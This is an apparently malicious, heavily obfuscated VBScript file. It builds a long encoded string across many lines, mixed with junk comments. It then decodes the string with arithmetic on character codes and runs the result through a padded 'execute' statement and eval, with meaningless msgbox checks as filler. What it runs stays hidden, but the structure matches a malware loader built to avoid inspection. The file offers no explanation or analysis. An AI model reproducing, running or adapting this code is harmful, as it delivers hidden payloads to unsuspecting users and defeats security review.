qchhr68 = "WGEGWHMEDHJGUHAHAHKFAFCFHFNHKGWGSHMGWGAGTHCGWGUHMELEFGEGUHKHBHIHMHBHGGYERFQHBHEGWGEHRHLHMGWHFGAGTHCGWGUH"
qchhr68=qchhr68&"MEFEMFEDJDGGEGWHMEDHJGUHAHAHKFAFCHHHLEDFHEDFNHKGWGSHMGWGAGTHCGWGUHMELEFGIGEGUHKHBHIHMERGEHAGWHEHEEF"
qchhr68=qchhr68&"EMFEDJDGHJGUHAHAHKFAFCHGHFHDEDFHEDFXHBGVELFNHKGWGSHMGWGAGTHCGWGUHMELEFGIGEGUHKHBHIHMERGEHAGWHEHEEFEMERGWHQHIG"
qchhr68=qchhr68&"SHGGVFPHGHOHBHKHHHGHFGWHGHMGEHMHKHBHGGYHLELEFEIFNGAFXGBGGGFFPGDFYFLFXFPEIEFEMEPEUEPEUEMFEDJDGH"
'fedbgnde
'brtcrjwn
'wwke
qchhr68=qchhr68&"JGUHAHAHKFAFCHGHFEDFHEDEFFNFEGNGGHLGWHKHLGNGBHNGTHEHBGUGNEFEJEDHJGUHAHAHKFAFCHGHFHDEDEJEDGSHLGUELFXHB"
qchhr68=qchhr68&"GVELHJGUHAHAHKFAFCHGHFHDEPEUEPEUEMEMEDEJEFERHOGTHLEFFEDJDGHBGXEDHGHHHMEDHJGUHAHAHKFAFCERFQ"
qchhr68=qchhr68&"HBHEGWFPHQHBHLHMHLELHJGUHAHAHKFAFCHGHFEMEDGFHAGWHGFEDJDGGEGWHMEDHJGUHAHAHKFAFCHMHQHMEDFHED"
qchhr68=qchhr68&"HJGUHAHAHKFAFCERFNHKGWGSHMGWGFGWHQHMFQHBHEGWELHJGUHAHAHKFAFCHGHFEPGFHKHNGWEMFEDJDGHJGUHAHAHKFAFCHMHQHMERG"
qchhr68=qchhr68&"IHKHBHMGWEDEFHHHGEDGWHKHKHHHKEDHKGWHLHNHFGWEDHGGWHQHMFEGVHBHFEDHPEUFEHPEUFHEWETFEHPEUFHHPEUEOEWEYF"
qchhr68=qchhr68&"EGVHBHFEDHPEVFEHPEVFHFAFCFEHPEVFHHPEVEOEWFEGVHBHFEDHPEWFEHPEWFHEVETFEHPEWFHHPEWEOEYFEGXHNHGGUHMHBHHHGEDGUHA"
'onqqaouedrpv
qchhr68=qchhr68&"HIHIGWGVELGTHPGVHGHKHNEMFEHFHNHJHAGTHBGXFHHPEVFEHPHCHBHGHGHFHKGWHEFHGSHLGUELFXHBGVELGTHPGVHGHK"
qchhr68=qchhr68&"HNEPEUEPEUEMEMEQHPEUFEGTHPGVHGHKHNFHFXHBGVELGTHPGVHGHKHNEPEVEPFWGWHGELGTHPGVHGHKHNEMEQEUEMFEHJGYHLGWHR"
qchhr68=qchhr68&"FHEFEFEFEFFEHPHAHBHEGWELFWGWHGELGTHPGVHGHKHNEMFIETEMHJGYHLGWHRFHHJGYHLGWHREJELFNHAHKELELELELGSHLGUELFXH"
qchhr68=qchhr68&"BGVELGTHPGVHGHKHNEPEUEPEUEMEMEQHPEUEMEMENHPEWEOELGSHLGUELFXHBGVELGTHPGVHGHKHNEPEVEPEUEMEMEQHPEUEMEQHPHCH"
'supjevtogrs
'mislorjflb
'trjvxodlqoaw
qchhr68=qchhr68&"BHGHGHFHKGWHEEQHFHNHJHAGTHBGXEMEMEMFEGTHPGVHGHKHNFHFXHBGVELGTHPGVHGHKHNEPEWEPFWGWHGELGTHPGVHGHKHNEMEQ"
qchhr68=qchhr68&"EVEMFEHPFPHGGVFEGUHAHIHIGWGVFHHJGYHLGWHRFEGWHGGVEDGXHNHGGUHMHBHHHGFEGVHBHFEDHPHDEUFEHPHDEUFHEFEFGCFSGAFTFPF"
qchhr68=qchhr68&"SGIFSFWFTFOFSGDFSGJFSGIFPGFFTFLFQFWFQFNFTFLFQFYFQFOFQGGFTFLFQFXFQGJFSFUFTFNFSFWFQFNFRGAFSGDFSFXFQ"
qchhr68=qchhr68&"FNFTFLFQFYFQFRFQFWFQFRFQFWFQFOFQFOFQFSFQGCFQGBFQGGFTFLFQFYFQGJFRGAFSGDFSFXFQFNFTFLFQFYFQFRFQFXFQF"
qchhr68=qchhr68&"RFRFYFSFYFSGIFQFNFTFLFQFYFQFOFQFSFQFWFQFOFQGGFTFLFQGAFQGJFPGHFPGHFPGHFPGHFQGGFTFRFSGCFSGDFSGGFS"
'byxewnnkwr
'fjhocimrqo
'ftwwnge
qchhr68=qchhr68&"FYFQFNFRFYFSFYFSGIFQFNFTFLFQFYFQFOFQGKFQFYFQFOFTFLFQGAFQGJFTFLFQGAFQFLFQFNFRFPFSGCFTFMFQFN"
'ptxm
qchhr68=qchhr68&"FQFNFQFNFQFNFSFUFTFNFSFWFQFNFRGAFSGDFSFXFQFNFTFLFQFYFQFRFQFWFQFRFQFWFQFOFQFOFQFSFQGCFQGBFQFOFQFOFQFPFQFXFQG"
qchhr68=qchhr68&"BFQFQFQFNFSFUFTFNFSFWFQFNFRGAFSGDFSFXFQFNFTFLFQFYFQFRFQFXFQFRFQFWFQFOFQFOFQFSFQGCFQGBFQFOFQFSFTFLFQFXFQFSFQG"
qchhr68=qchhr68&"DFQFWFQFOFQFOFQFOFQGGFTFLFQFYFQGJFRGAFSGDFSFXFQFNFTFLFQFYFQFRFQFYFQFRFRFYFSFYFSGIFQFNFTFLFQFYF"
'yjuxebbvj
'cakrrxhb
qchhr68=qchhr68&"QFOFQFSFQFXFQFOFQGGFTFRFRFRFSGIFSFXFQGGFTFLFQFWFQGJFTFLFQGAFQGGFSFYFSGIFSFXFPGFFSGAFTFPFSGI"
qchhr68=qchhr68&"FSFWFTFOFSGDFSGJFSGIFQGGFTFNFSFYFTFOFPGFFSGJFRFUFQGJFPGFFRFPFTFMFSFYFSFUFTFOFSFYFRGCFSFVFSGEFSFYFSFWFTF"
qchhr68=qchhr68&"OFQFNFPGHFPGHFRGAFSGDFSFWFTFMFSGJFTFNFSGJFSGAFTFOFQFTFSFLFRGAFRFYFRFUFRGHFRGHFRGDFPGHFPGHFQ"
'nxewka
'devwjfaq
'bjowgodjy
qchhr68=qchhr68&"FOFQGGFSGJFRFUFQFTFSGJFSGKFSFYFSGIFPGFFPGHFPGHFSGKFSGJFTFNFTFOFPGHFPGHFQFRFPGFFPGHFPGHFSGCFT"
qchhr68=qchhr68&"FOFTFOFSGKFQGGFQFUFQFUFQGCFQGCFQFTFQGDFQFVFQFTFQFXFQFYFQGDFQFTFQFWFQGDFQGBFQFUFSFVFSFXFQFXFQFW"
'jfrmnjw
'aytpgisywel
qchhr68=qchhr68&"FQFTFSGKFSGCFSGKFPGHFPGHFPGFFQFRFPGFFQFVFQGGFSGJFRFUFQFTFTFNFSFYFTFOFRGFFSFYFTFLFTFPFSFYFTFN"
'dceghmwbpm
qchhr68=qchhr68&"FTFOFRFUFSFYFSFUFSFXFSFYFTFMFPGFFPGHFPGHFRFPFSGJFSGIFTFOFSFYFSGIFTFOFQFSFRGHFTFTFSGKFSFYFPGHFPGHFQFRFP"
'wtqnesvlpt
qchhr68=qchhr68&"GFFPGHFPGHFSFUFSGKFSGKFSGGFSGDFSFWFSFUFTFOFSGDFSGJFSGIFQFUFTFSFQFSFTFRFTFRFTFRFQFSFSGAFSGJFTFMFSGHFQ"
qchhr68=qchhr68&"FSFTFPFTFMFSGGFSFYFSGIFSFWFSGJFSFXFSFYFSFXFPGHFPGHFQGGFSGJFRFUFQFTFTFNFSFYFSGIFSFXFPGFFPGHFPGHFTFLFQGJFQ"
'ooqgbo
'nlccjcjt
'vxmpdcxxey
qchhr68=qchhr68&"FWFPGHFPGHFQGGFTFSFQGBFQGJFSGJFRFUFQFTFTFMFSFYFTFNFSGKFSGJFSGIFTFNFSFYFRGHFSFYFTFSFTFOFQGGFSFYFTFSFSFYFS"
'feoxahgijdc
'uuxcieqgysk
'pvffoidhb
qchhr68=qchhr68&"FWFTFPFTFOFSFYFQFNFTFLFQFWFQFNFTFSFQGBFQFOFQFOEFEFFEHPHDEVFHGUHAHIHIGWGVELHPHDEUEMFEGVHBHFEDHLGYGWEU"
qchhr68=qchhr68&"FEHBGXEDELEFEFHRHAEXHRHAGYEFEFEDFHEDEFEFHPGYEYEXEFEFEMEDGFHAGWHGFEEDHFHLGYGTHHHQELEFEFHAFAEYF"
qchhr68=qchhr68&"AHAGYGSGXGVEFEFEMFEGWHGGVEDHBGXEDFEHLGYGWEUEDFHEDHKGWHIHEGSGUGWELEFEFEDEEEDEEGWEEHQEEGWGUEFE"
'jemenapn
qchhr68=qchhr68&"FEDEJEDEDEDEFEFHNEEEFEFEDEJEDEFEFHMEEEFEFEDEJEDEFEFEEGWEDEEEDEDEDELEFEFEJGUHAHKELEWEXEMEJEDHPHDEVEDEJGU"
qchhr68=qchhr68&"HAHKELEWEXEMEJEFEFEMEEEFEFEPEFEFEEEFEFEPEFEFEFEFEMFEEDHBGXEDELEFEFHRHAEXHRHAGYEFEFEDFHEDEFE"
qchhr68=qchhr68&"FHPGYEYEXEFEFEMEDGFHAGWHGFEEDHFHLGYGTHHHQELEFEFHAFAEYFAHAGYGSGXGVEFEFEMFEGWHGGVEDHBGXFEEDGWHOGSHEEDHLGYGW"
'pbmjhjr
qchhr68=qchhr68&"EUFEEDHBGXEDELEFEFHAHMHRHNGWHKHRHMHAGVGYEFEFEDFHEDEFEFHRHCEYHMHKEFEFEMEDGFHAGWHGFEEDHFHLGYGTHHHQELEFEFHRHC"
'cdvduk
'iwfbkb
'ukfckjn
qchhr68=qchhr68&"FAEYFAHNHAHMGYEFEFEMFEGWHGGVEDHBGXFEEDEFFEDJDGHJGUHAHAHKFAFCHMHQHMERFNHEHHHLGWFEDJDGGEGWHMEDHJGUHAHAHKFA"
'yvpaqfqvdwi
'swsek
'sqioummpr
qchhr68=qchhr68&"FCHEEDFHEDFNHKGWGSHMGWGAGTHCGWGUHMELEFGEHAGWHEHEERFLHIHIHEHBGUGSHMHBHHHGEFEMFEDJDGHJGUHAHAHKFAFCHEERGEH"
qchhr68=qchhr68&"AGWHEHEFPHQGWGUHNHMGWEDHJGUHAHAHKFAFCHGHFEPEDEFEFEPEDEFEFEPEDEFHHHIGWHGEFEPEDETFEDJDGFPHGGVEDFTGXFEDJDG"
'snhtdmqjrkt

'khlexfbbfqvjiwlyrddjhkqtfqkbtawsefbtmiivvrgkrv
'gkcgcfaenxfigjgpxjkdu
utjyilgpghrtn497=49:
'gawvnseqiuubkawmoagokuagknxiabveaobvidugsul
ifplt969 = 65
urjbtqyqxnf992=asc(_
Mid(qchhr68,1,1))-ifplt969
ikvrcryochtb382 = 2
kgyvpal226 = 1
qchhr68=Mid(_
qchhr68,ikvrcryochtb382,Len(_
qchhr68)-kgyvpal226)
rpbvuj470=""
roic649 = 0
while(_
Len(_
qchhr68)>roic649)
rpbvuj470=rpbvuj470&(_
Chr((((asc(_
Mid(qchhr68,kgyvpal226,kgyvpal226))-ifplt969))_
*25+(asc(Mid(qchhr68,ikvrcryochtb382,kgyvpal226))_
-ifplt969)-urjbtqyqxnf992-utjyilgpghrtn497)))
'vgxgnwwyfjmdjmvqmgyrxlx
'uiagusqhqefvtbnjxxtwrimvlmghxxodshdhy
qchhr68=Mid(qchhr68,3,Len(qchhr68)_
-ikvrcryochtb382)
'pujdxjnvvykdqyragbamerxjerrlycsaxohyowefyxgu
wEnd
'ldcqcdyexbpiobaldtpyqujksfoup
'fyrpmlehvamupkpddnevxwd
dim juibugokrxk190
ifplt969 = 30
ikvrcryochtb382 = 4
kgyvpal226 = ifplt969 +  ikvrcryochtb382
roic649 = kgyvpal226 + 1
'nwaqvfawbbefnvvmkxfredeavvetasfsoefqql

if ("gyhdfga" = juibugokrxk190) Then
msgbox "gh4ertgsdfhha"
End if 

'xlkxtviceljnddxlaopxwlkegavediclaf
'yvdchofueddfesdbwxnvmbslaoorksdilgpaipfmujkcysrexhgcxwnyjo

if ("gyhdfga" = juibugokrxk190) Then
msgbox "gh4ertgsdfhha"
End if 

ifplt969 = replace("# ## # ##  ## # # ## # # ## # #  ##  #e##x"  &   "##e#c#u##te #  ## ("&chr(kgyvpal226)& replace(rpbvuj470,chr(kgyvpal226),chr(kgyvpal226)&chr(kgyvpal226)) &chr(kgyvpal226)&")",chr(roic649),"")
'uqgchknuxtkubhwwq

if ("gyhdfga" = juibugokrxk190) Then
msgbox "gh4ertgsdfhha"
End if 

ifplt969 = Replace(Replace(ifplt969, vbLf, ""), vbCr, "")

if ("gyhdfga" = juibugokrxk190) Then
msgbox "gh4ertgsdfhha"
End if 

eval ifplt969
'ubyekghouqbxbgjeqdmduidnspsbbacmobuvurkutnfohgrtklmv
'hjjnowbiwiccmocxayd

if ("gyhdfga" = juibugokrxk190) Then
msgbox "gh4ertgsdfhha"
End if 
